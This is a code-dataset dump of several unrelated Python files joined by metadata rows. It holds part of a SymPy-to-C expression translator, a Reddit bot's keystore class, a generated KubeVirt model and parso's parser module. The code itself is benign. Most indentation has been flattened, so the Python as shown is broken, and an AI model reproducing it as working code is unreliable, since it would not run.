return "rt_cos(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_COSH
elif tree.func == SympyCosh:
return "rt_cosh(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_COT
elif tree.func == SympyCot:
return "rt_cot(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_COTH
elif tree.func == SympyCoth:
return "rt_coth(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_CSC
elif tree.func == SympyCsc:
return "rt_csc(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_DELAY
#TODO
#SEE BELOW !
# AST_FUNCTION_EXP
elif tree.func == SympyExp:
return "rt_exp(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_FACTORIAL
elif tree.func == SympyFactorial:
return "rt_factorial(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_FLOOR
elif tree.func == SympyFloor:
return "rt_floor(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_LOG
elif tree.func == SympyLog:
if len(tree.args) == 2:
return "(rt_log(%s)/rt_log(%s))" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
else:
return "rt_log(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_PIECEWISE
elif tree.func == SympyPiecewise:
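   # emit nested C ternaries: (c1?v1:(c2?v2:...:(RCONST(0.0))))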
(t_val, t_cond) = tree.args[0]
line = "(%s?%s" % (self.translateForC(t_cond), self.translateForC(t_val))
line_end = ")"
for piece in range(1, len(tree.args)):
(t_val, t_cond) = tree.args[piece]
line = line + ":(%s?%s" % (self.translateForC(t_cond), self.translateForC(t_val))
line_end = line_end + ")"
line = line + ":(RCONST(0.0))" + line_end
return line
# AST_FUNCTION_PIECEWISE
elif tree.func == SympyITE:
t_cond = tree.args[0]
t_val = tree.args[1]
t_other_val = tree.args[2]
line = "(%s?%s:%s)" % (self.translateForC(t_cond), self.translateForC(t_val), self.translateForC(t_other_val))
return line
# AST_FUNCTION_POWER
elif tree.func == SympyPow:
if len(tree.args) == 2 and tree.args[1].func == SympyNegOne:
return "RCONST(1.0)/(%s)" % self.translateForC(tree.args[0])
return "rt_pow(%s, %s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
# AST_FUNCTION_ROOT
  elif tree.func == SympyRoot:
   return "rt_pow(%s, (RCONST(1.0)/%s))" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
# AST_FUNCTION_SEC
elif tree.func == SympySec:
return "rt_sec(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_SIN
elif tree.func == SympySin:
return "rt_sin(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_SINH
elif tree.func == SympySinh:
return "rt_sinh(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_TAN
elif tree.func == SympyTan:
return "rt_tan(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_TANH
elif tree.func == SympyTanh:
return "rt_tanh(%s)" % self.translateForC(tree.args[0])
elif tree.func == SympyEqual:
return "rt_eq(%s, %s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
elif tree.func == SympyUnequal:
return "rt_neq(%s, %s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
elif tree.func == SympyGreaterThan:
return "rt_geq(%s, %s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
elif tree.func == SympyLessThan:
return "rt_leq(%s, %s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
elif tree.func == SympyStrictGreaterThan:
return "rt_gt(%s, %s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
elif tree.func == SympyStrictLessThan:
return "rt_lt(%s, %s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
elif tree.func == SympyAnd:
t_args = "("
for i_arg in range(0, len(tree.args)):
if i_arg > 0:
t_args = t_args + " && "
t_args = t_args + self.translateForC(tree.args[i_arg])
return t_args + ")"
elif tree.func == SympyOr:
t_args = "("
for i_arg in range(0, len(tree.args)):
if i_arg > 0:
t_args = t_args + " || "
t_args = t_args + self.translateForC(tree.args[i_arg])
return t_args + ")"
elif tree.func == SympyXor:
return self.translateForC(simplify(tree))
elif tree.func == SympyNot:
return "(!%s)" % self.translateForC(tree.args[0])
elif tree.func == SympyImplies:
# p -> q == !p || q
# print srepr(tree)
# print tree.evalf()
return "(!" + self.translateForC(tree.args[0]) + " || " + self.translateForC(tree.args[1]) + ")"
elif tree.func == SympyUnevaluatedMin:
if len(tree.args) == 1:
return self.translateForC(tree.args[0])
   elif len(tree.args) > 1:
    expr = "min(" + self.translateForC(tree.args[0]) + ", " + self.translateForC(tree.args[1]) + ")"
    for i, arg in enumerate(tree.args):
     if i > 1:
      expr = "min(" + expr + ", " + self.translateForC(tree.args[i]) + ")"
    return expr
elif tree.func == SympyUnevaluatedMax:
if len(tree.args) == 1:
return self.translateForC(tree.args[0])
   elif len(tree.args) > 1:
    expr = "max(" + self.translateForC(tree.args[0]) + ", " + self.translateForC(tree.args[1]) + ")"
    for i, arg in enumerate(tree.args):
     if i > 1:
      expr = "max(" + expr + ", " + self.translateForC(tree.args[i]) + ")"
    return expr
elif tree.func == SympyFunction:
raise DelayNotImplemented()
else:
raise MathException("C Math Writer : Unknown Sympy Symbol %s" % str(tree))
return str(tree)
| gpl-3.0 | -8,722,728,192,466,864,000 | 25.868922 | 113 | 0.634354 | false |
Watchful1/RedditSubsBot | src/database/_keystore.py | 1 | 1342 | import discord_logging
import utils
from classes.key_value import KeyValue
log = discord_logging.get_logger()
class _DatabaseKeystore:
def __init__(self):
  self.session = self.session  # for pycharm linting
  self.log_debug = self.log_debug  # for pycharm linting
def save_keystore(self, key, value):
if self.log_debug:
log.debug(f"Saving keystore: {key} : {value}")
self.session.merge(KeyValue(key, value))
def get_keystore(self, key):
if self.log_debug:
log.debug(f"Fetching keystore: {key}")
key_value = self.session.query(KeyValue).filter_by(key=key).first()
if key_value is None:
if self.log_debug:
log.debug("Key not found")
return None
if self.log_debug:
log.debug(f"Value: {key_value.value}")
return key_value.value
def save_datetime(self, key, date_time):
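  # datetimes are persisted as strings and parsed back in get_datetime()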
self.save_keystore(key, utils.get_datetime_string(date_time))
def get_datetime(self, key, is_date=False):
result = self.get_keystore(key)
if result is None:
return None
else:
result_date = utils.parse_datetime_string(result)
if is_date:
return result_date.date()
else:
return result_date
def get_or_init_datetime(self, key):
result = self.get_datetime(key)
if result is None:
log.warning(f"Initializing key {key} to now")
now = utils.datetime_now()
self.save_datetime(key, now)
return now
return result
| mit | -628,551,014,755,818,100 | 23.851852 | 69 | 0.695976 | false |
kubevirt/client-python | kubevirt/models/v1beta1_data_volume_blank_image.py | 1 | 2409 | # coding: utf-8
"""
KubeVirt API
    This is the KubeVirt API, an add-on for Kubernetes.
OpenAPI spec version: 1.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1beta1DataVolumeBlankImage(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
}
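    # no attributes: a blank-image data volume source is an empty JSON object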
attribute_map = {
}
def __init__(self):
"""
V1beta1DataVolumeBlankImage - a model defined in Swagger
"""
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1beta1DataVolumeBlankImage):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| apache-2.0 | -3,823,461,405,543,961,600 | 23.333333 | 77 | 0.514321 | false |
lmregus/Portfolio | python/design_patterns/env/lib/python3.7/site-packages/parso/python/parser.py | 1 | 8593 | from parso.python import tree
from parso.python.token import PythonTokenTypes
from parso.parser import BaseParser
NAME = PythonTokenTypes.NAME
INDENT = PythonTokenTypes.INDENT
DEDENT = PythonTokenTypes.DEDENT
class Parser(BaseParser):
"""
This class is used to parse a Python file, it then divides them into a
class structure of different scopes.
:param pgen_grammar: The grammar object of pgen2. Loaded by load_grammar.
"""
node_map = {
'expr_stmt': tree.ExprStmt,
'classdef': tree.Class,
'funcdef': tree.Function,
'file_input': tree.Module,
'import_name': tree.ImportName,
'import_from': tree.ImportFrom,
'break_stmt': tree.KeywordStatement,
'continue_stmt': tree.KeywordStatement,
'return_stmt': tree.ReturnStmt,
'raise_stmt': tree.KeywordStatement,
'yield_expr': tree.YieldExpr,
'del_stmt': tree.KeywordStatement,
'pass_stmt': tree.KeywordStatement,
'global_stmt': tree.GlobalStmt,
'nonlocal_stmt': tree.KeywordStatement,
'print_stmt': tree.KeywordStatement,
'assert_stmt': tree.AssertStmt,
'if_stmt': tree.IfStmt,
'with_stmt': tree.WithStmt,
'for_stmt': tree.ForStmt,
'while_stmt': tree.WhileStmt,
'try_stmt': tree.TryStmt,
'comp_for': tree.CompFor,
# Not sure if this is the best idea, but IMO it's the easiest way to
# avoid extreme amounts of work around the subtle difference of 2/3
        # grammar in list comprehensions.
'list_for': tree.CompFor,
# Same here. This just exists in Python 2.6.
'gen_for': tree.CompFor,
'decorator': tree.Decorator,
'lambdef': tree.Lambda,
'old_lambdef': tree.Lambda,
'lambdef_nocond': tree.Lambda,
}
default_node = tree.PythonNode
# Names/Keywords are handled separately
_leaf_map = {
PythonTokenTypes.STRING: tree.String,
PythonTokenTypes.NUMBER: tree.Number,
PythonTokenTypes.NEWLINE: tree.Newline,
PythonTokenTypes.ENDMARKER: tree.EndMarker,
PythonTokenTypes.FSTRING_STRING: tree.FStringString,
PythonTokenTypes.FSTRING_START: tree.FStringStart,
PythonTokenTypes.FSTRING_END: tree.FStringEnd,
}
def __init__(self, pgen_grammar, error_recovery=True, start_nonterminal='file_input'):
super(Parser, self).__init__(pgen_grammar, start_nonterminal,
error_recovery=error_recovery)
self.syntax_errors = []
self._omit_dedent_list = []
self._indent_counter = 0
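        # when error recovery drops an INDENT, the matching DEDENT is skipped via _omit_dedent_list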
def parse(self, tokens):
if self._error_recovery:
if self._start_nonterminal != 'file_input':
raise NotImplementedError
tokens = self._recovery_tokenize(tokens)
return super(Parser, self).parse(tokens)
def convert_node(self, nonterminal, children):
"""
Convert raw node information to a PythonBaseNode instance.
This is passed to the parser driver which calls it whenever a reduction of a
grammar rule produces a new complete node, so that the tree is build
strictly bottom-up.
"""
try:
node = self.node_map[nonterminal](children)
except KeyError:
if nonterminal == 'suite':
# We don't want the INDENT/DEDENT in our parser tree. Those
# leaves are just cancer. They are virtual leaves and not real
# ones and therefore have pseudo start/end positions and no
# prefixes. Just ignore them.
children = [children[0]] + children[2:-1]
elif nonterminal == 'list_if':
# Make transitioning from 2 to 3 easier.
nonterminal = 'comp_if'
elif nonterminal == 'listmaker':
# Same as list_if above.
nonterminal = 'testlist_comp'
node = self.default_node(nonterminal, children)
for c in children:
c.parent = node
return node
def convert_leaf(self, type, value, prefix, start_pos):
# print('leaf', repr(value), token.tok_name[type])
if type == NAME:
if value in self._pgen_grammar.reserved_syntax_strings:
return tree.Keyword(value, start_pos, prefix)
else:
return tree.Name(value, start_pos, prefix)
return self._leaf_map.get(type, tree.Operator)(value, start_pos, prefix)
def error_recovery(self, token):
tos_nodes = self.stack[-1].nodes
if tos_nodes:
last_leaf = tos_nodes[-1].get_last_leaf()
else:
last_leaf = None
if self._start_nonterminal == 'file_input' and \
(token.type == PythonTokenTypes.ENDMARKER
or token.type == DEDENT and '\n' not in last_leaf.value
and '\r' not in last_leaf.value):
            # In Python, statements need to end with a newline. But since it's
            # possible (and valid in Python) that there's no newline at the
# end of a file, we have to recover even if the user doesn't want
# error recovery.
if self.stack[-1].dfa.from_rule == 'simple_stmt':
try:
plan = self.stack[-1].dfa.transitions[PythonTokenTypes.NEWLINE]
except KeyError:
pass
else:
if plan.next_dfa.is_final and not plan.dfa_pushes:
# We are ignoring here that the newline would be
# required for a simple_stmt.
self.stack[-1].dfa = plan.next_dfa
self._add_token(token)
return
if not self._error_recovery:
return super(Parser, self).error_recovery(token)
def current_suite(stack):
# For now just discard everything that is not a suite or
# file_input, if we detect an error.
for until_index, stack_node in reversed(list(enumerate(stack))):
# `suite` can sometimes be only simple_stmt, not stmt.
if stack_node.nonterminal == 'file_input':
break
elif stack_node.nonterminal == 'suite':
# In the case where we just have a newline we don't want to
# do error recovery here. In all other cases, we want to do
# error recovery.
if len(stack_node.nodes) != 1:
break
return until_index
until_index = current_suite(self.stack)
if self._stack_removal(until_index + 1):
self._add_token(token)
else:
typ, value, start_pos, prefix = token
if typ == INDENT:
# For every deleted INDENT we have to delete a DEDENT as well.
# Otherwise the parser will get into trouble and DEDENT too early.
self._omit_dedent_list.append(self._indent_counter)
error_leaf = tree.PythonErrorLeaf(typ.name, value, start_pos, prefix)
self.stack[-1].nodes.append(error_leaf)
tos = self.stack[-1]
if tos.nonterminal == 'suite':
            # Need at least one statement in the suite. This happened with the
# error recovery above.
try:
tos.dfa = tos.dfa.arcs['stmt']
except KeyError:
# We're already in a final state.
pass
def _stack_removal(self, start_index):
all_nodes = [node for stack_node in self.stack[start_index:] for node in stack_node.nodes]
if all_nodes:
node = tree.PythonErrorNode(all_nodes)
for n in all_nodes:
n.parent = node
self.stack[start_index - 1].nodes.append(node)
self.stack[start_index:] = []
return bool(all_nodes)
def _recovery_tokenize(self, tokens):
for token in tokens:
typ = token[0]
if typ == DEDENT:
# We need to count indents, because if we just omit any DEDENT,
# we might omit them in the wrong place.
o = self._omit_dedent_list
if o and o[-1] == self._indent_counter:
o.pop()
continue
self._indent_counter -= 1
elif typ == INDENT:
self._indent_counter += 1
yield token
| mit | 5,602,873,020,152,564,000 | 38.417431 | 98 | 0.56837 | false |